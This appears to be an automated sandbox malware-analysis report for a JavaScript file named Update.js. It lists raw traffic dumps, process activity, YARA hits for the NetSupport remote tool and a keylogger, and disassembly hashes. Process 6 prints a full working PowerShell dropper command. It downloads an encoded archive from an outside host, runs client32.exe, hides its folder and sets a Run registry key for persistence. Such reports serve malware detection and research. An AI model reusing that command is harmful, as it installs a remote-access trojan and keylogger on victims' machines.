                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 6b 52 54 65 6c 44 6b 4e 36 70 6a 6f 75 4c 71 35 70 74 2f 45 63 34 73 56 33 31 32 50 57 6f 4e 35 6c 44 55 42 32 44 48 71 44 65 2b 47 76 75 46 59 4e 5a 43 31 39 45 71 59 6b 68 72 6b 2b 45 6b 54 4c 51 36 72 57 49 48 6e 4d 36 52 53 44 50 62 32 56 4d 38 73 47 4c 4d 59 37 6f 35 72 36 65 42 78 6c 59 76 61 4b 58 65 5a 62 2b 38 57 6d 30 30 79 58 7a 69 33 6f 75 2b 68 6a 2b 39 69 63 53 30 55 4a 75 7a 4b 78 5a 39 79 48 62 48 36 37 37 43 44 34 2b 68 59 38 76 34 4f 4d 72 2b 50 67 61 50 72 36 44 6a 37 50 77 63 51 45 69 31 5a 7a 31 39 35 4f 67 67 41 67 42 79 39 35 6f 51 4f 35 42 31 71 32 47 31 47 49 36 38 63 55 59 62 64 33 37 39 32 68 57 7a 55 35 65 42 48 44 53 6f 58 72 35 30 4a 38 75 4d 77 68 38 4e 38 76 4e 79 63 54 66 64 78 53 59 2b 77 73 70 33 48 6b 57 50 66 52 77 43
                                                                                Data Ascii: kRTelDkN6pjouLq5pt/Ec4sV312PWoN5lDUB2DHqDe+GvuFYNZC19EqYkhrk+EkTLQ6rWIHnM6RSDPb2VM8sGLMY7o5r6eBxlYvaKXeZb+8Wm00yXzi3ou+hj+9icS0UJuzKxZ9yHbH677CD4+hY8v4OMr+PgaPr6Dj7PwcQEi1Zz195OggAgBy95oQO5B1q2G1GI68cUYbd3792hWzU5eBHDSoXr50J8uMwh8N8vNycTfdxSY+wsp3HkWPfRwC
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 50 78 6d 6b 67 34 36 31 36 37 4e 51 52 33 41 44 31 63 2f 34 5a 41 66 76 4e 4d 6a 6f 48 57 55 43 33 38 57 6d 44 4f 4b 72 59 48 55 75 74 76 73 78 76 71 63 2b 30 47 79 48 57 62 4b 75 2b 31 45 38 62 51 4f 61 5a 54 4c 72 6a 6a 7a 74 43 4e 4a 37 75 49 61 43 59 33 79 6e 50 5a 52 31 5a 78 4d 73 4f 66 61 32 4a 7a 53 6d 62 6a 2b 41 75 54 49 39 63 55 53 4a 51 39 70 75 61 2b 4c 4d 6d 52 46 44 44 4a 41 35 75 4e 73 73 63 73 4a 38 44 68 76 47 69 71 76 30 32 50 47 62 2b 51 47 30 6d 5a 6d 54 57 6c 7a 4a 78 56 41 74 67 59 71 59 2b 62 35 44 49 54 65 63 7a 6b 38 4a 6f 43 76 65 57 46 54 4c 36 5a 54 38 45 71 78 6a 49 63 58 6e 6a 73 5a 71 45 5a 6b 75 43 68 66 2f 6c 6d 2b 41 61 52 78 63 68 4e 2f 35 4c 2b 58 34 4a 56 4e 43 45 77 67 5a 46 76 49 2f 50 4d 63 67 62 37 75 44 54 35 56
                                                                                Data Ascii: Pxmkg46167NQR3AD1c/4ZAfvNMjoHWUC38WmDOKrYHUutvsxvqc+0GyHWbKu+1E8bQOaZTLrjjztCNJ7uIaCY3ynPZR1ZxMsOfa2JzSmbj+AuTI9cUSJQ9pua+LMmRFDDJA5uNsscsJ8DhvGiqv02PGb+QG0mZmTWlzJxVAtgYqY+b5DITeczk8JoCveWFTL6ZT8EqxjIcXnjsZqEZkuChf/lm+AaRxchN/5L+X4JVNCEwgZFvI/PMcgb7uDT5V
                                                                                2024-09-10 14:33:47 UTC16384INData Raw: 66 63 52 64 4e 73 30 4a 2f 48 4a 54 76 6e 75 31 5a 36 77 32 6a 6f 31 7a 59 6b 43 72 6e 6b 75 4d 70 79 72 34 37 6d 58 41 49 33 4a 55 78 73 4d 4d 2b 45 6e 57 64 77 4d 50 38 5a 59 66 75 4e 30 6a 4e 65 41 4f 57 44 2b 63 52 6f 47 4d 78 35 65 32 46 67 54 71 54 44 57 38 6f 74 4d 4a 6a 48 52 56 6f 37 53 68 76 4d 34 77 55 75 65 6d 55 65 56 75 36 6d 6f 36 37 42 53 6b 56 36 79 31 36 6f 5a 4b 7a 57 44 33 4f 35 39 30 4b 77 7a 4d 64 57 71 68 62 2f 74 57 51 69 36 43 59 38 4d 64 33 5a 77 6e 55 57 65 48 37 37 4b 49 41 45 76 6b 41 31 64 58 4e 69 56 7a 58 56 67 76 6c 4a 5a 4d 62 50 32 63 41 57 73 4d 35 43 79 6e 2f 64 76 34 74 71 79 6a 59 6b 6d 75 70 52 45 6a 70 62 7a 46 69 6c 57 2f 32 30 71 7a 34 43 4c 2f 48 46 50 2f 47 4d 38 6f 65 55 32 6a 4b 50 6f 55 70 53 34 4a 4a 44 37
                                                                                Data Ascii: fcRdNs0J/HJTvnu1Z6w2jo1zYkCrnkuMpyr47mXAI3JUxsMM+EnWdwMP8ZYfuN0jNeAOWD+cRoGMx5e2FgTqTDW8otMJjHRVo7ShvM4wUuemUeVu6mo67BSkV6y16oZKzWD3O590KwzMdWqhb/tWQi6CY8Md3ZwnUWeH77KIAEvkA1dXNiVzXVgvlJZMbP2cAWsM5Cyn/dv4tqyjYkmupREjpbzFilW/20qz4CL/HFP/GM8oeU2jKPoUpS4JJD7
                                                                                2024-09-10 14:33:48 UTC16384INData Raw: 70 4e 73 6b 45 77 43 73 6f 39 65 38 36 2f 33 68 35 64 50 57 79 39 6e 58 39 39 6d 64 75 67 2b 45 56 43 30 4e 67 67 66 56 6e 31 35 41 5a 7a 41 47 77 65 76 2f 37 6e 50 77 76 77 61 36 32 41 55 71 62 2b 6f 58 45 45 34 54 67 30 6c 76 7a 6c 30 64 69 45 67 50 79 73 6e 7a 79 58 50 7a 38 64 2b 66 50 7a 58 59 77 58 6c 52 64 6a 77 4d 77 74 4c 45 2f 4f 31 31 38 66 68 4d 79 68 73 57 72 6a 43 5a 31 32 76 64 78 68 47 78 47 45 35 66 63 50 6f 49 2f 52 33 51 4c 77 6d 68 32 61 63 61 55 38 36 57 58 6a 6d 4b 71 5a 39 44 67 5a 6e 39 52 2b 48 4d 73 49 79 34 6f 32 41 79 74 35 4d 73 73 63 57 77 44 55 74 63 2f 7a 62 6b 4e 52 67 69 44 4f 79 47 69 5a 6d 50 72 61 71 76 44 54 45 39 47 4d 36 68 38 6c 6e 62 70 32 42 72 43 6e 2f 52 6c 34 48 39 6d 57 74 43 55 6c 2f 4e 4a 55 4e 61 78 77 43
                                                                                Data Ascii: pNskEwCso9e86/3h5dPWy9nX99mdug+EVC0NggfVn15AZzAGwev/7nPwvwa62AUqb+oXEE4Tg0lvzl0diEgPysnzyXPz8d+fPzXYwXlRdjwMwtLE/O118fhMyhsWrjCZ12vdxhGxGE5fcPoI/R3QLwmh2acaU86WXjmKqZ9DgZn9R+HMsIy4o2Ayt5MsscWwDUtc/zbkNRgiDOyGiZmPraqvDTE9GM6h8lnbp2BrCn/Rl4H9mWtCUl/NJUNaxwC
                                                                                2024-09-10 14:33:48 UTC16384INData Raw: 62 51 4d 34 2b 65 30 2b 69 5a 53 38 2b 70 39 4a 78 43 7a 32 78 36 5a 74 45 7a 6b 35 34 5a 39 45 79 6a 70 34 4f 65 64 6e 72 61 36 4c 6b 56 74 2b 73 6d 31 39 47 7a 6e 70 34 4e 39 48 79 59 6e 6f 2f 53 38 33 46 36 50 6b 46 50 32 74 36 62 2f 41 77 39 6e 36 58 6e 62 6e 6f 2b 54 38 38 39 39 48 79 42 6e 76 76 70 2b 51 6f 39 51 2f 52 38 6a 5a 36 48 36 58 6d 45 35 32 6e 47 35 7a 76 30 33 6b 37 50 6b 2f 54 73 6f 47 63 6e 50 52 6b 39 54 39 47 7a 69 35 37 64 39 49 7a 53 73 34 2b 65 4a 73 72 48 52 6b 38 37 50 52 33 30 64 4e 49 7a 6a 5a 34 5a 39 4d 79 6b 5a 78 59 39 73 2b 6b 35 68 5a 35 54 36 5a 6c 4c 7a 32 6e 30 7a 4b 4e 6e 41 54 32 66 70 4f 63 38 65 70 62 53 73 34 2b 65 55 58 70 32 30 37 4f 4c 6e 71 66 6f 79 65 6a 5a 53 63 38 4f 65 70 36 6b 5a 7a 75 76 4c 7a 32 50 30
                                                                                Data Ascii: bQM4+e0+iZS8+p9JxCz2x6ZtEzk54Z9Eyjp4Oednra6LkVt+sm19Gznp4N9HyYno/S83F6PkFP2t6b/Aw9n6Xnbno+T8899HyBnvvp+Qo9Q/R8jZ6H6XmE52nG5zv03k7Pk/TsoGcnPRk9T9Gzi57d9IzSs4+eJsrHRk87PR30dNIzjZ4Z9MykZxY9s+k5hZ5T6ZlLz2n0zKNnAT2fpOc8epbSs4+eUXp207OLnqfoyejZSc8Oep6kZzuvLz2P0
                                                                                2024-09-10 14:33:48 UTC16384INData Raw: 63 36 2f 79 72 6c 58 30 6e 38 61 30 55 68 4e 68 4d 43 65 70 34 44 41 4a 44 72 4e 2f 58 47 62 46 5a 62 6a 62 6f 4d 46 58 45 79 71 4d 61 6e 69 77 72 57 39 6c 77 63 7a 53 74 34 4b 34 6d 59 55 48 63 66 70 64 61 75 67 37 52 58 56 4c 44 31 61 46 48 41 58 55 69 47 4a 74 4f 32 61 7a 51 41 48 66 49 73 45 32 35 4b 2f 2b 74 63 58 43 59 54 55 54 47 56 33 59 2f 35 4d 68 66 51 41 63 63 43 4e 64 39 55 6d 56 6f 4e 33 68 30 73 53 78 36 51 5a 50 56 39 39 46 74 4a 66 65 30 71 76 64 4f 72 30 32 6e 41 76 45 76 57 6d 76 52 47 6f 2b 37 36 4c 75 34 58 32 31 66 36 54 55 4d 31 4a 51 6f 48 57 2f 71 31 67 62 36 65 37 44 64 35 2b 66 69 70 61 6a 62 4d 51 6e 75 78 59 32 73 56 38 64 30 63 46 64 2b 53 64 58 46 31 56 54 4e 4d 4d 72 68 44 58 4c 31 67 4e 73 30 30 31 55 58 34 75 2b 73 77 6c
                                                                                Data Ascii: c6/yrlX0n8a0UhNhMCep4DAJDrN/XGbFZbjboMFXEyqManiwrW9lwczSt4K4mYUHcfpdaug7RXVLD1aFHAXUiGJtO2azQAHfIsE25K/+tcXCYTUTGV3Y/5MhfQAccCNd9UmVoN3h0sSx6QZPV99FtJfe0qvdOr02nAvEvWmvRGo+76Lu4X21f6TUM1JQoHW/q1gb6e7Dd5+fipajbMQnuxY2sV8d0cFd+SdXF1VTNMMrhDXL1gNs001UX4u+swl


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:10:33:34
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
                                                                                Imagebase:0x7ff7c1a20000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:10:33:44
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C9342A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C934153000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C93417C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C933F40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2317672682.000001C934171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:10:33:44
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:10:33:50
                                                                                Start date:10/09/2024
                                                                                Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                                                                Imagebase:0x3a0000
                                                                                File size:103'824 bytes
                                                                                MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.2312535683.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 27%, ReversingLabs
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:13
                                                                                Start time:10:34:02
                                                                                Start date:10/09/2024
                                                                                Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                                                                Imagebase:0x3a0000
                                                                                File size:103'824 bytes
                                                                                MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.2434122140.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.2437590353.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:16
                                                                                Start time:10:34:05
                                                                                Start date:10/09/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7403e0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:18
                                                                                Start time:10:34:10
                                                                                Start date:10/09/2024
                                                                                Path:C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe"
                                                                                Imagebase:0x3a0000
                                                                                File size:103'824 bytes
                                                                                MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.2518264391.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.2516794939.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000000.2515693268.00000000003A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.2518228905.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FFD33FD7B67 Relevance: 6.6, Strings: 5, Instructions: 342COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 7[C$hL"4$hL"4$hL"4$hL"4
                                                                                  • API String ID: 0-3500843204
                                                                                  • Opcode ID: 24e64ab17e623dc52e447c03d251c971e135bed4b94a90d25b65093b92be3572
                                                                                  • Instruction ID: 0008161fb43a3b2e10d9c3554de2fcb1eb598e564dc5631af4baafe88336072e
                                                                                  • Opcode Fuzzy Hash: 24e64ab17e623dc52e447c03d251c971e135bed4b94a90d25b65093b92be3572
                                                                                  • Instruction Fuzzy Hash: 04A13D21F1E94A0FEBA5AB2C44753B967D1EF89314F8501BAE14ED72CADD3CAC069341
                                                                                  Function 00007FFD340A491E Relevance: 1.8, Strings: 1, Instructions: 505COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2360433888.00007FFD340A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd340a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x7[C
                                                                                  • API String ID: 0-410071247
                                                                                  • Opcode ID: 0cd97b4c00bdb1f7839e7dc3c46606f67abcd374c1b28a3053f6ec3e5c561884
                                                                                  • Instruction ID: d97ff0b29ac8f229628910d92953322f43929bc9cabe18109cabd54e9d1cdbf3
                                                                                  • Opcode Fuzzy Hash: 0cd97b4c00bdb1f7839e7dc3c46606f67abcd374c1b28a3053f6ec3e5c561884
                                                                                  • Instruction Fuzzy Hash: D6E11326B1EB860FE7E69B2848A52B43BE1EF57210B1901FFD18DC71A3D91DAC06D351
                                                                                  Function 00007FFD33FD7310 Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: dc1ca176533cbd18281bccd219e0a95470b0a5d679ef9622c1e6f86f3ca19dd1
                                                                                  • Instruction ID: a1056debdc1eb9fe6221e5655a72bacc9d600b84c95994fcac5d5c8f2b9412ab
                                                                                  • Opcode Fuzzy Hash: dc1ca176533cbd18281bccd219e0a95470b0a5d679ef9622c1e6f86f3ca19dd1
                                                                                  • Instruction Fuzzy Hash: EC917C3070DA5C4FD765EB2C9859ABA7BD1EF89320F0402BBF48DC7266C929DC468381
                                                                                  Function 00007FFD33FD62B8 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: hL"4
                                                                                  • API String ID: 0-542164673
                                                                                  • Opcode ID: 61603365589deadebdb70f2642c0ba20a51dfeae45776647129fc9787cef318e
                                                                                  • Instruction ID: ef9d0c7ed6259e9c4f9ae2c626f7296d808a23e3bc9fb8280f5fff9d9187df16
                                                                                  • Opcode Fuzzy Hash: 61603365589deadebdb70f2642c0ba20a51dfeae45776647129fc9787cef318e
                                                                                  • Instruction Fuzzy Hash: 6041B131B0991A4BEFA5EA1C94293BD33E1EF99350F90033AE50EE32D9DE396C014385
                                                                                  Function 00007FFD33FD6550 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: [.
                                                                                  • API String ID: 0-1638407628
                                                                                  • Opcode ID: 4873bc8f0ec0b003e1ea67f23b3614b3d37b2f7fb9d9ee8a57da0270b78631b0
                                                                                  • Instruction ID: 3cf267745af5ca8bfe85d475cc30b8f00b40a3ce979c32503f9c74134bbcb7c7
                                                                                  • Opcode Fuzzy Hash: 4873bc8f0ec0b003e1ea67f23b3614b3d37b2f7fb9d9ee8a57da0270b78631b0
                                                                                  • Instruction Fuzzy Hash: F741CF20B0D90A4FEFA4F76C8169AB933D1EF58310B950679E14ED329ADD38FC829741
                                                                                  Function 00007FFD33FD6618 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6[C
                                                                                  • API String ID: 0-431184632
                                                                                  • Opcode ID: 7205aba2e5ce8218236d157decf6bc4a9dc67c39dfa895254a50b29c75c731a8
                                                                                  • Instruction ID: a74c5504a16f87552448de4e2c63fce3394f82a548ea085b0a5e6cb5c8b8f1ee
                                                                                  • Opcode Fuzzy Hash: 7205aba2e5ce8218236d157decf6bc4a9dc67c39dfa895254a50b29c75c731a8
                                                                                  • Instruction Fuzzy Hash: 1C41EF30A0EA4A4FEB95EB2C94293B977E1EF89310F80037AD50DE3296DE3958558381
                                                                                  Function 00007FFD33FD67C2 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h`"4
                                                                                  • API String ID: 0-285702469
                                                                                  • Opcode ID: aad683f250146ec99dcf6ef423d786768c58203e67397a9b393c62d6f5e68eb6
                                                                                  • Instruction ID: 494b23a4a83e92c3cabdeffba5a5a949bba1e342a266ba1c34ae10792d9f1dcc
                                                                                  • Opcode Fuzzy Hash: aad683f250146ec99dcf6ef423d786768c58203e67397a9b393c62d6f5e68eb6
                                                                                  • Instruction Fuzzy Hash: FF01B572F0C6090BD75C594C65172BC73C1FB89620F84023FE58FE3385DE25A803468A
                                                                                  Function 00007FFD33FD67D6 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h`"4
                                                                                  • API String ID: 0-285702469
                                                                                  • Opcode ID: b1b7cb0b5ccc1f66dc2ea9e508b3c691b7d6e877898fe88ed50297ac70190c4d
                                                                                  • Instruction ID: edbfa92c611be4c90660a27828b35d88bf44b6a1615ef4ea7f4e999530140c8a
                                                                                  • Opcode Fuzzy Hash: b1b7cb0b5ccc1f66dc2ea9e508b3c691b7d6e877898fe88ed50297ac70190c4d
                                                                                  • Instruction Fuzzy Hash: 44017572F0C6194BD758594C65171BD73C1FB89620F84133FE58FE2285DE25A8135686
                                                                                  Function 00007FFD33FD67E7 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2359651799.00007FFD33FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd33fd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h`"4
                                                                                  • API String ID: 0-285702469
